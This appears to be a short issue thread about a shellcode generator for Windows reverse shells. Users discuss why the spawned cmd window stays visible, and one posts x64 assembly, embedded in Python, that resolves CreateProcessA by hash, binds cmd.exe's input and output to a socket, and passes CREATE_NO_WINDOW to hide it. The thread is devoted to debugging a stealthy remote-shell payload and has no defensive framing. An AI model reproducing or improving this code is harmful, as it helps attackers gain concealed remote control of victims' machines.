When the C payload is made, no matter what you do in the program to hide the cmd window, it will open regardless of whether you make it into a DLL or C++. Nothing works, so I think the problem is in the payload itself.
Hi @ShorterKing, thanks for your feedback. I think the issue resides in the Creation Flag argument passed to the CreateProcessA function. I will test it with the updated argument value and let you know.
Yes, I thought the same, so I tried this. It hides the shell, but the shell dies as soon as it connects. Hope this may help.
```python
"call_createprocess:"
" mov r9, rbp;" # R9 stores the base address of Kernel32.dll
" mov r8d, 0x16b3fe72;" # Hash of CreateProcessA
" call parse_module;" # Get the address of CreateProcessA
f"{shell_type}"
" push rdx;"
" mov rdx, rsp;" # Pointer to "cmd.exe" is stored in the RDX register
" push r12;" # The member STDERROR is the return value of WSASocketA
" push r12;" # The member STDOUTPUT is the return value of WSASocketA
" push r12;" # The member STDINPUT is the return value of WSASocketA
" xor rcx, rcx;"
" push cx;" # Pad with 0x00 before pushing the dwFlags member, only the total size matters
" push rcx;"
" push rcx;"
" mov cl, 0xff;"
" inc cx;" # 0xff+1=0x100
" push cx;" # dwFlags=0x100
" push "+str(CREATE_NO_WINDOW)+";"
" xor rcx, rcx;"
```